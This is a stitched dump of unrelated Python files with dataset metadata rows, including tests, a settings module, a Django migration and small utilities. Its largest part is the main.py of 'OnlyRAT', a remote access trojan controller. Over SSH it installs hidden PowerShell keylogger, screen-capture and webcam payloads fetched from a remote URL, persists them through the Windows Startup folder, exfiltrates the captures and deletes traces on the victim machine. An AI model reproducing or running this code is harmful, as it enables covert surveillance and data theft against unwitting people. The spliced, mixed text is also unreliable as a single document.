    # Build the (3, n) spherical representation of the reference points.
    spherical_points = np.vstack(cart2sph(x_ref, y_ref, z_ref))
    coords = Coordinates()
    coords.spherical = spherical_points
    # The internal Cartesian arrays must match the originals up to rounding.
    for actual, expected in ((coords._x, x_ref),
                             (coords._y, y_ref),
                             (coords._z, z_ref)):
        npt.assert_allclose(actual, expected, atol=tol)
def test_n_points():
    """n_points should count the stored coordinate triples."""
    coords = Coordinates([1, 0], [1, 1], [0, 1])
    assert coords.n_points == 2
def test_find_nearest():
    """find_nearest_point should return the index of the closest point."""
    coords = Coordinates([1, 0], [1, 1], [0, 1])
    point = Coordinates(1, 1, 0)
    dist, idx = coords.find_nearest_point(point)
    assert idx == 0
def test_len():
    """len() should equal the number of stored points."""
    coords = Coordinates([1, 0], [1, 1], [0, 1])
    assert len(coords) == 2
def test_getitem():
    """Indexing should return a Coordinates view of a single point."""
    coords = Coordinates([1, 0], [1, 1], [0, 1])
    getcoords = coords[0]
    npt.assert_allclose(np.squeeze(getcoords.cartesian), np.array([1, 1, 0]))
def test_setitem():
    """Item assignment should overwrite a single point in place."""
    coords = Coordinates([0, 0], [1, 1], [0, 1])
    setcoords = Coordinates(1, 1, 0)
    coords[0] = setcoords
    npt.assert_allclose(np.squeeze(coords.cartesian),
                        np.array([[1, 0], [1, 1], [0, 1]]))
def test_sampling_sphere_init():
    """A bare SamplingSphere() call should construct a SamplingSphere."""
    sampling = SamplingSphere()
    assert isinstance(sampling, SamplingSphere)
def test_sampling_sphere_init_value():
    """SamplingSphere should accept x, y, z and n_max positional values."""
    sampling = SamplingSphere(1, 0, 0, 0)
    assert isinstance(sampling, SamplingSphere)
def sampling_cube():
    """Helper function returning the six axis-aligned cube sampling points."""
    x = [1, -1, 0, 0, 0, 0]
    y = [0, 0, 1, -1, 0, 0]
    z = [0, 0, 0, 0, 1, -1]
    return x, y, z
def test_getter_n_max():
    """n_max passed to the constructor should be readable via the property."""
    x, y, z = sampling_cube()
    n_max = 1
    sampling = SamplingSphere(x, y, z, n_max)
    assert sampling.n_max == n_max
def test_setter_n_max():
    """Assigning n_max should update the internal _n_max attribute."""
    x, y, z = sampling_cube()
    n_max = 1
    sampling = SamplingSphere(x, y, z, 0)
    sampling.n_max = n_max
    assert sampling._n_max == n_max
def test_merge():
    """merge should append the other object's points column-wise."""
    s1 = Coordinates(1, 0, 0)
    s2 = Coordinates(0, 2, 0)
    s1.merge(s2)
    truth = np.array([[1, 0], [0, 2], [0, 0]])
    npt.assert_allclose(truth, s1.cartesian)
| 25.016026 | 77 | 0.626393 | 1,219 | 7,805 | 3.869565 | 0.093519 | 0.017808 | 0.147763 | 0.170659 | 0.664405 | 0.556286 | 0.49841 | 0.45707 | 0.389018 | 0.351495 | 0 | 0.04739 | 0.226778 | 7,805 | 311 | 78 | 25.096463 | 0.734217 | 0.01704 | 0 | 0.444915 | 0 | 0 | 0.006654 | 0 | 0 | 0 | 0 | 0 | 0.211864 | 1 | 0.152542 | false | 0 | 0.025424 | 0 | 0.182203 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2591028d9fa27e5f6e75b62f0ecb5005aedac84 | 18,397 | py | Python | main.py | CosmodiumCS/OnlyRAT | deb7ed6b99788cacc420461fc0e72072a470d258 | [
"BSD-3-Clause"
] | 21 | 2022-01-07T20:20:10.000Z | 2022-03-28T20:55:07.000Z | main.py | CosmodiumCS/OnlyRAT | deb7ed6b99788cacc420461fc0e72072a470d258 | [
"BSD-3-Clause"
] | 3 | 2022-02-07T02:59:22.000Z | 2022-03-01T22:34:45.000Z | main.py | CosmodiumCS/OnlyRAT | deb7ed6b99788cacc420461fc0e72072a470d258 | [
"BSD-3-Clause"
] | 3 | 2022-02-01T13:49:13.000Z | 2022-02-09T05:48:47.000Z | #!/usr/bin/python
# python console for OnlyRAT
# created by : C0SM0
# imports
import os
import sys
import getpass
import random as r
from datetime import datetime
# banner for display
banner = """
_;,
,,=-,--,,__ _,-;:;;},,,_
_,oo, Ll _,##&&&&$$&&$$$&-=;%%^%&;v:&& @ `=,_
,oO" `0} Ll ,%#####&#>&&$$$$&$$$&,&'$$#`"%%;,,,*%^<}
_,--O;_, 0_ Ll ,%%%%%&%-#&###$$"$$$$$*;&&$,#;%^*%$$^{,%;'
,cC'oO`'CC ,OnnNNNNn, Ll YY, ,%#&%%$$$$%%%%%##&&^$%^%&&&$$'&#,-%%--"'
,CCCO" `C ,0`Nn` `Nn Ll YY, ,;;##&,$$$$$$$;,%%%&&%%%&&&&&&$$%%'
{CC{ ,0' NN NN Ll Yy yY';#&,#,$$$$$%%%%%%%%&%%%&&&&&&%%`
CCC( _o0 NN NN Ll YyyY ,;&##&###%%$$%&&%%%%#^%^&&&&&%{`
,OCC{ ,0C NN NN Ll YY ;#&&#####&%;%&&,%%%%#%=%%%&^%%
,O`'"Cc_.o0cC NN NN Ll y, YY ;&&&^##&&&$%&&&%%%"` `%%%%
o0 _o0"` '` NN NN Ll Yy,yYY '^%%&VGh%%%%%&&"^%_,, "%%%,_ _,.,_
0o,_,oo0" NN NN Ll `YyY` ``'"lIG9ubHkg,,""''` ""%%>_,;VyIG5lZ;,
"00O"` ``'``""UkFUIHlvdSdsbCBldm;" `"WQ=,
"""
# _..----.._ _
# .' .--. "-.(0)_
# '-.__.-'"'=:| , _)_ \\__ . c\\'-..
# '''------'---''---'-"
# :::::::: :::: ::: ::: ::: ::: ::::::::: ::: :::::::::::
# :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
# +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
# +#+ +:+ +#+ +:+ +#+ +#+ +#++: +#++:++#: +#++:++#++: +#+
# +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
# ######## ### #### ########## ### ### ### ### ### ###
# [::] The Only RAT You'll Ever Need [::]
# [::] Created By : Blue Cosmo [::]
# help menu
help_menu = """
[+] Arguments:
<username>.rat = configuration file
[+] Example:
onlyrat bluecosmo.rat
"""
# option menu
options_menu = """
[+] Command and Control:
[orconsole] ------ Remote Console
[fix orconsole] -- Fix Remote Console
[upload] --------- Upload File
[downlaod] ------- Download File
[restart] -------- Restart Target PC
[shutdown] ------- Shutdown Target PC
[killswitch] ----- Removes OnlyRAT From Target
[+] Reconnaissance:
[install keylogger] ------ Install Keylogger
[install screencapture] -- Install ScreenCapture
[install webcam] --------- Install WebCam Capture
[grab keylogs] ----------- Grab Keylogs
[grab screenshots] ------- Grab ScreenShots From ScreenCapture
[grab webcam] ------------ Grab WebCam Photos
[+] Options:
[help] ------- Help Menu
[man] -------- Onlyrat Manual
[config] ----- Display RAT File
[version] ---- Version Number
[update] ----- Update OnlyRAT
[uninstall] -- Uninstall OnlyRAT
[quit] ------- Quit
* any other commands will be
sent through your terminal
[*] Select an [option]...
"""
username = getpass.getuser() # gets username
header = f"[~] {username}@onlyrat $ " # sets up user input interface
remote_path = "raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main" # url path for OnlyRAT files
local_path = f"/home/{username}/.OnlyRAT" if username != "root" else "/root/.OnlyRAT" # gets path of OnlyRAT
# random text generator for obfuscation
def random_text():
lower_case = "abcdefghijklmnopqrstuvwxyz"
upper_case = "abcdefghijklmnopqrstuvwxyz".upper()
characters = lower_case + upper_case
generated_text = ""
for i in range(10):
generated_text += r.choice(list(characters))
return generated_text
# read config file
def read_config(config_file):
configuration = {}
# get file contents
read_lines = open(config_file, "r").readlines()
# get target configurations
configuration["IPADDRESS"] = read_lines[0].strip()
configuration["PASSWORD"] = read_lines[1].strip()
configuration["WORKINGDIRECTORY"] = (read_lines[2]).replace("\\", "/").strip()
configuration["STARTUPDIRECTORY"] = (read_lines[3]).replace("\\", "/").strip()
return configuration
# display configuration file data
def print_config(configuration):
for key, value in configuration.items():
print(f"{key} : {value}")
# clear screen
def clear():
os.system("clear")
# terminates program
def exit():
print("\n[*] Exiting...")
sys.exit()
# gets current date and time
def current_date():
current = datetime.now()
return current.strftime("%m-%d-%Y_%H-%M-%S")
# connects rat to target
def connect(address, password):
print("\n [*] Connecting to target...")
# remotely connect
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address}")
# remote uploads with SCP
def remote_upload(address, password, upload, path):
print("\n[*] Starting Upload...")
# scp upload
os.system(f"sshpass -p \"{password}\" scp {upload} onlyrat@{address}:{path}")
print("[+] Upload complete\n")
# remote download with SCP
def remote_download(address, password, path):
print("\n[*] Starting Download...")
# scp download
os.system("mkdir ~/Downloads")
os.system(f"sshpass -p \"{password}\" scp -r onlyrat@{address}:{path} ~/Downloads")
print("[+] Download saved to \"~/Downloads\"\n")
# run commands remotely with SCP
def remote_command(address, password, command):
# remote command execution
os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address} '{command}'")
# keylogger
def keylogger(address, password, username, working):
print("\n[*] Prepping keylogger...")
# web requests
keylogger_command = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/keylogger.ps1 -OutFile {working}/KHRgMHYmdT.ps1\""
controller_command = f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/KHRgMHYmdT.ps1 >> GiLqXiexKP.cmd"
print("[+] Keylogger prepped")
# installing keylogger
print("[*] Installing keylogger...")
remote_command(address, password, keylogger_command)
print("[*] Installing controller...")
remote_command(address, password, controller_command)
print("[+] Keylogger installed sucessfully\n")
# execute logger
print("\n[!] Restart target computer to execute")
# takes screenshots off of target
def grab_screenshots(address, password, working, username):
# download screenshot
print("\n[*] Downloading screenshots...")
screenshot_location = f"{working}/amETlOMhPo"
remote_download(address, password, screenshot_location)
print("[+] Screenshots downloaded")
# formatting screenshots
print("[*] Fromatting screenshots...")
loot_folder = f"screenshots-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/amETlOMhPo")
print("[+] Screenshots formatted")
# deletes screenshots off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/amETlOMhPo/*"
remote_command(address, password, delete_screenshots)
print("[+] Screenshots downloaded")
# confirmation
print("\n[+] Screenshots downloaded to \"~/Downloads\"\n")
# takes webcam pictures off of target
def grab_webcam(address, password, working, username):
# download webcam photos
print("\n[*] Downloading webcam photos...")
screenshot_location = f"{working}/bNOEXCxyVp"
remote_download(address, password, screenshot_location)
print("[+] Photos downloaded")
# formatting webcam photos
print("[*] Fromatting photos...")
loot_folder = f"webcam-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/bNOEXCxyVp")
print("[+] Photos formatted")
# deletes photos off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/bNOEXCxyVp/*.bmp"
remote_command(address, password, delete_screenshots)
print("[+] Photos downloaded")
# confirmation
print("\n[+] Photos downloaded to \"~/Downloads\"\n")
# killswitch
def killswitch(address, password, working, username):
print("\n[*] Prepping killswitch...")
# web requests
killswitch_command = f"powershell /c cd C:; Remove-Item {working}/* -r -Force; Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Remove-Item \"C:/Users/onlyrat\" -r -Force; Remove-LocalUser -Name \"onlyrat\"; shutdown /r"
print("[+] Killswitch prepped")
# installing killswitch
print("[*] Executing killswitch...")
remote_command(address, password, f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && del GiLqXiexKP.cmd")
remote_command(address, password, killswitch_command)
print("[+] Killswitch Executed sucessfully\n")
# execute logger
print("\n[*] Restarting target computer...")
# custom upload
def upload(address, password, working):
# get upload file
print("\n[~] Enter file you wish to upload :")
upload_file = input(header)
# upload file
print("\n[*] Uploading...")
remote_upload(address, password, upload_file, working)
print(f"[+] Uploaded sucessfully to \"{working}\"\n")
# custom download
def download(address, password):
# get download path
print("\n[~] Enter path of file you wish to download :")
download_file = input(header)
# download file
print("\n[*] Downloading...")
remote_download(address, password, download_file)
# update OnlyRAT
def update():
print("\n[*] Checking for updates...")
# get latest version nubmer
os.system(f"curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt")
# save version nubmers to memory
current_version = float(open(f"{local_path}/version.txt", "r").read())
latest_version = float(open(f"{local_path}/latest.txt", "r").read())
# remove version number file
os.system("rm -rf ~/.OnlyRAT/latest.txt")
# if new version is available, update
if latest_version > current_version:
print("\n[+] Update found")
print("[~] Update Onlyrat? [y/n]\n")
# user input, option
option = input(f"{header}")
# update
if option == "y":
os.system(f"sh ~/.OnlyRAT/payloads/update.sh")
# exception
else:
main()
# otherwise, run main code
else:
print("\n[+] OnlyRAT already up to date")
print("[*] Hit any key to continue...\n")
input(header)
main()
# uninstalls onlyrat
def remove():
# confirmation
print("\n[~] Are you sure you want to remove OnlyRAT [y/n]\n")
# user input
option = input(header)
# delete OnlyRAT
if option == "y":
os.system("rm -rf ~/.OnlyRAT")
# cancel
if option == "n":
main()
# listener
def listener():
pass
# command line interface
def cli(arguments):
# display banner
clear()
# listener
# if sys.argv[1] == "listener":
# listener()
print(banner)
# if arguments exist
if arguments:
print("\t[~] Type \"help\" for help menu :\n")
# loop user input
while True:
# user input, option
option = input(header)
# check if configuration file exists
try:
configuration = read_config(sys.argv[1])
except FileNotFoundError:
print("\n[!!] File does not exist")
exit()
# get config info
ipv4 = configuration.get("IPADDRESS")
password = configuration.get("PASSWORD")
working_direcory = configuration.get("WORKINGDIRECTORY")
startup_direcory = configuration.get("STARTUPDIRECTORY")
target_username = working_direcory[9:-19]
# remote console
if option == "orconsole":
connect(ipv4, password)
# fix remote console
if option == "fix orconsole":
os.system(f"sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}")
# keylogger option
elif option == "install keylogger":
keylogger(ipv4, password, target_username, working_direcory)
# grab keylogs option
elif option == "grab keylogs":
remote_download(ipv4, password, f"{working_direcory}/{target_username}.log")
remote_command(ipv4, password, f"powershell New-Item -Path {working_direcory}/{target_username}.log -ItemType File -Force")
print("[+] Log file saved to \"~/Downloads\"")
print("[+] Log file on target has been wiped\n")
# installs screen capture option
elif option == "install screencapture":
print("\n[*] Installing screen capture...")
install_screencaputre = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/screenshot.ps1 -OutFile {working_direcory}/SbQRViPjIq.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/SbQRViPjIq.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_screencaputre)
remote_command(ipv4, password, add_to_startup)
print("[+] ScreenCapture installed\n")
print("\n[!] Restart target computer to execute\n")
# grab screenshots option
elif option == "grab screenshots":
grab_screenshots(ipv4, password, working_direcory, target_username)
# custom upload
elif option == "upload":
upload(ipv4, password, working_direcory)
# custom download
elif option == "download" or option == "exfiltrate":
download(ipv4, password)
# restart target option
elif option == "restart":
remote_command(ipv4, password, "shutdown /r")
# shutdown target option
elif option == "shutdown":
remote_command(ipv4, password, "shutdown")
# install webcam option
elif option == "install webcam":
print("\n[*] Installing webcam capture...")
install_webcam = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/webcam.ps1 -OutFile {working_direcory}/bNOEXCxyVp/LIspiXrVAu.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell cd $env:temp/bNOEXCxyVp; Start-Process powershell.exe -windowstyle hidden $env:temp/bNOEXCxyVp/LIspiXrVAu.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_webcam)
remote_command(ipv4, password, add_to_startup)
print("[+] Webcam capture installed\n")
print("\n[!] Restart target computer to execute\n")
# grab webcam photos
elif option == "grab webcam":
grab_webcam(ipv4, password, working_direcory, target_username)
# help menu
elif option == "help":
print(banner)
print(options_menu)
# display config file info
elif option == "config":
print_config(configuration)
print(f"USERNAME : {target_username}")
# get version number
elif option == "version":
os.system(f"cat {local_path}/version.txt")
# update option
elif option == "update":
update()
exit()
# kill switch
elif option == "killswitch":
print("\n[~] Are you sure you want to remove OnlyRAT from your target [y/n")
confirm = input(header)
if confirm == "y":
killswitch(ipv4, password, working_direcory, target_username)
else:
main()
# onlyrat manual
elif option == "man" or option == "manual":
os.system(f"xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md")
# remove installation
elif option == "remove" or option == "uninstall":
remove()
# quit option
elif option == "quit" or option == "exit":
exit()
# exception
else:
os.system(option)
# new line for cleaner UI
print("\n")
# if arguments don't exist
else:
print(help_menu)
# main code
def main():
# clear screen
clear()
# checks for arguments
try:
sys.argv[1]
except IndexError:
arguments_exist = False
else:
arguments_exist = True
# run command line interface
cli(arguments_exist)
# runs main code
if __name__ == "__main__":
# runs main function
main() | 35.31094 | 290 | 0.556504 | 1,819 | 18,397 | 5.539307 | 0.202309 | 0.016078 | 0.013398 | 0.019452 | 0.275407 | 0.233029 | 0.201171 | 0.167527 | 0.1448 | 0.128325 | 0 | 0.004554 | 0.283851 | 18,397 | 521 | 291 | 35.310941 | 0.760228 | 0.152634 | 0 | 0.149826 | 0 | 0.020906 | 0.447832 | 0.094845 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0.156794 | 0.017422 | 0 | 0.101045 | 0.216028 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c25ba35db5bd64116bd38546b3ed9d907f3e15a6 | 296 | py | Python | review-sentiment/sentiment-backend/sentiment/config.py | aldeeb/xai-demonstrator | 45b600bd326923a21dc2c6e2659b58ab3c7b9bd4 | [
"Apache-2.0"
] | 8 | 2021-05-03T13:05:49.000Z | 2022-01-11T02:57:33.000Z | review-sentiment/sentiment-backend/sentiment/config.py | aldeeb/xai-demonstrator | 45b600bd326923a21dc2c6e2659b58ab3c7b9bd4 | [
"Apache-2.0"
] | 467 | 2021-01-22T16:58:56.000Z | 2022-03-28T11:15:09.000Z | review-sentiment/sentiment-backend/sentiment/config.py | aldeeb/xai-demonstrator | 45b600bd326923a21dc2c6e2659b58ab3c7b9bd4 | [
"Apache-2.0"
] | 8 | 2021-05-25T16:10:18.000Z | 2022-02-28T13:21:31.000Z | from pydantic import BaseSettings
class Settings(BaseSettings):
    """Service configuration; values can be overridden via environment
    variables (pydantic BaseSettings behaviour)."""
    service_name: str = "sentiment-service"
    root_path: str = ""     # ASGI root path prefix
    path_prefix: str = ""   # prefix prepended to route paths

    # Explanation configuration
    default_explainer: str = "integrated_gradients"
    default_target: int = 4
# Module-level singleton used by the rest of the service.
settings = Settings()
| 21.142857 | 51 | 0.709459 | 31 | 296 | 6.580645 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004237 | 0.202703 | 296 | 13 | 52 | 22.769231 | 0.860169 | 0.084459 | 0 | 0 | 0 | 0 | 0.137546 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c25fb52a5f4ceebfdfc69c188bf075e9881ab1e6 | 383 | py | Python | python_libraries/numpy_lib.py | peter88tom/python_rebooted | 042ca1c3905816c809a724434a9d797a4de0dd61 | [
"MIT"
] | null | null | null | python_libraries/numpy_lib.py | peter88tom/python_rebooted | 042ca1c3905816c809a724434a9d797a4de0dd61 | [
"MIT"
] | null | null | null | python_libraries/numpy_lib.py | peter88tom/python_rebooted | 042ca1c3905816c809a724434a9d797a4de0dd61 | [
"MIT"
] | null | null | null | """
NumPy is a general-purpose-array-processing package.
It provide a high performance multidimensional array object,
"""
import numpy as np
# Creating array object
arr = np.array([[1, 2, 3],
[4, 2, 5]])
# Print type of array
print(f"Array is of type: {type(arr)}")
print(f"Size of array is: {arr.size}")
print(f"Shape of array is: {arr.shape}")
print(f"Number of")
| 23.9375 | 60 | 0.668407 | 64 | 383 | 4 | 0.484375 | 0.09375 | 0.070313 | 0.09375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019169 | 0.182768 | 383 | 15 | 61 | 25.533333 | 0.798722 | 0.407311 | 0 | 0 | 0 | 0 | 0.440367 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.571429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
c26195a4b33e7b336f66409294188c812f2b2c1e | 407 | py | Python | src/czml3/utils.py | idanmiara/czml3 | 0fec1e2b87cc84f4afa1e3c7b0354b1596caafb0 | [
"MIT"
] | null | null | null | src/czml3/utils.py | idanmiara/czml3 | 0fec1e2b87cc84f4afa1e3c7b0354b1596caafb0 | [
"MIT"
] | null | null | null | src/czml3/utils.py | idanmiara/czml3 | 0fec1e2b87cc84f4afa1e3c7b0354b1596caafb0 | [
"MIT"
] | null | null | null | from .properties import Color
def get_color(color):
    """Build a ``Color`` from a hex string, an integer, or an RGB(A) list.

    Dispatches on the runtime type of *color*:
    - ``str`` of length 6..10 -> ``Color.from_str``
    - ``int``                 -> ``Color.from_hex``
    - ``list`` of length <= 4 -> ``Color.from_list``

    Raises ``ValueError`` for anything else.
    """
    if isinstance(color, str):
        if 6 <= len(color) <= 10:
            return Color.from_str(color)
    elif isinstance(color, int):
        return Color.from_hex(color)
    elif isinstance(color, list):
        if len(color) <= 4:
            return Color.from_list(color)
    raise ValueError("Invalid input")
| 29.071429 | 56 | 0.653563 | 55 | 407 | 4.727273 | 0.454545 | 0.173077 | 0.173077 | 0.184615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012739 | 0.228501 | 407 | 13 | 57 | 31.307692 | 0.815287 | 0.093366 | 0 | 0 | 0 | 0 | 0.035422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c26778354005772e2aa996574f8a2003e99a4f80 | 764 | py | Python | blog/migrations/0005_auto_20180328_0653.py | leventaysan/My-first-project | cc9b3a5d55414dbb927fd74230d43122e08c3a03 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20180328_0653.py | leventaysan/My-first-project | cc9b3a5d55414dbb927fd74230d43122e08c3a03 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20180328_0653.py | leventaysan/My-first-project | cc9b3a5d55414dbb927fd74230d43122e08c3a03 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-03-28 06:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Must be applied after the previous blog migration.
    dependencies = [
        ('blog', '0004_auto_20180314_1027'),
    ]
    # Schema changes on the Post model:
    # - add 'okunmasayisi' (Turkish: presumably "read count" — confirm intent)
    #   as an integer defaulting to 0;
    # - make 'link' and 'video' optional (blank=True); videos upload to 'BlogVideo'.
    operations = [
        migrations.AddField(
            model_name='post',
            name='okunmasayisi',
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='post',
            name='link',
            field=models.URLField(blank=True),
        ),
        migrations.AlterField(
            model_name='post',
            name='video',
            field=models.FileField(blank=True, upload_to='BlogVideo'),
        ),
    ]
| 24.645161 | 70 | 0.570681 | 76 | 764 | 5.578947 | 0.671053 | 0.063679 | 0.091981 | 0.120283 | 0.174528 | 0.174528 | 0 | 0 | 0 | 0 | 0 | 0.064272 | 0.307592 | 764 | 30 | 71 | 25.466667 | 0.73724 | 0.089005 | 0 | 0.347826 | 1 | 0 | 0.099567 | 0.033189 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2694f547c73f59688656a31c3d35127cbefd810 | 2,799 | py | Python | digest_csvs.py | jlcanovas/sourcecred-tooling | 4b52b7783db6c5be14b518035c57df9b64214f65 | [
"Apache-2.0"
] | null | null | null | digest_csvs.py | jlcanovas/sourcecred-tooling | 4b52b7783db6c5be14b518035c57df9b64214f65 | [
"Apache-2.0"
] | 2 | 2020-05-26T09:53:20.000Z | 2020-05-26T10:32:15.000Z | digest_csvs.py | jlcanovas/sourcecred-tooling | 4b52b7783db6c5be14b518035c57df9b64214f65 | [
"Apache-2.0"
] | 1 | 2020-05-25T17:12:12.000Z | 2020-05-25T17:12:12.000Z | #!/usr/bin/python
#
# This script generates a simple HTML page (via STDOUT) including tables for the data generated by join_csvs.py script.
# Each table will contain 3 x 2 colums, that is, 3 columns per CSV file (currently only 2 CSV files are supported).
#
# The resulting table is something like:
# name_CSV1,cred_CSV1,name_cred_CSV2
# jlcanovas,23.21,jcabo,22.33
#
# It helps to visualize and compare the cred variations between graphs with different weights
#
# Author: Javier Canovas (me@jlcanovas.es)
#
import csv
import sys


def read_userlike_rows(csv_path):
    """Read a join_csvs.py output CSV and return its USERLIKE rows.

    Only rows whose third column is "USERLIKE" are kept (other rows describe
    non-user graph nodes). Rows are returned as tuples sorted by descending
    cred (column 1, parsed as float).
    """
    rows = []
    with open(csv_path, newline='') as csv_file:
        for row in csv.reader(csv_file, delimiter=','):
            if row[2] == "USERLIKE":
                rows.append(tuple(row))
    return sorted(rows, key=lambda r: float(r[1]), reverse=True)


files = [
    # Set here the name of the projects to consider (e.g., "d3/d3")
]

# These variables are used to locate the CSV files:
# for each project the script reads PREFFIX + files[i] + SUFFIX1
# and PREFFIX + files[i] + SUFFIX2.
PREFFIX = "credResult_"
SUFFIX1 = "_CODERS.csv"
SUFFIX2 = "_COMMENTERS.csv"

# Number of rows to list in each table
TABLE_SIZE = 10

# Emit the (ad hoc) HTML page skeleton and table styling.
print('<!DOCTYPE html><html><head></head>')
print('<style>')
print('table { border: 1px solid black; margin-right: auto; margin-left: auto; margin-top: 15px;}')
print('th { padding: 5px 10px 5px 10px; text-align: center; border-bottom: 1px solid #000000; }')
print('td { padding: 5px 10px 5px 10px; text-align: left; border-bottom: 1px solid #ddd; }')
print('</style>')
print('<body>')

# One table per project, pairing coder cred with commenter cred side by side.
for file in files:
    # FIX: the CSV-reading/sorting logic was duplicated for the two files;
    # both now go through read_userlike_rows().
    coder_sorted = read_userlike_rows(PREFFIX + file + SUFFIX1)
    commenters_sorted = read_userlike_rows(PREFFIX + file + SUFFIX2)
    # Printing the table for this couple of CSVs
    print('<table>')
    print(f'<tr><th colspan="4">{file}</th></tr>')
    print('<tr><th>Username</th><th>Coder Cred</th><th>Username</th><th>Commenter Cred</th></tr>')
    # FIX: cap at TABLE_SIZE but never index past the shorter list — the
    # original raised IndexError when a CSV had fewer than TABLE_SIZE users.
    for i in range(min(TABLE_SIZE, len(coder_sorted), len(commenters_sorted))):
        print(f'<tr><td>{coder_sorted[i][3]}</td><td>{coder_sorted[i][1]}</td><td>{commenters_sorted[i][3]}</td><td>{commenters_sorted[i][1]}</td>')
    print('</table>')
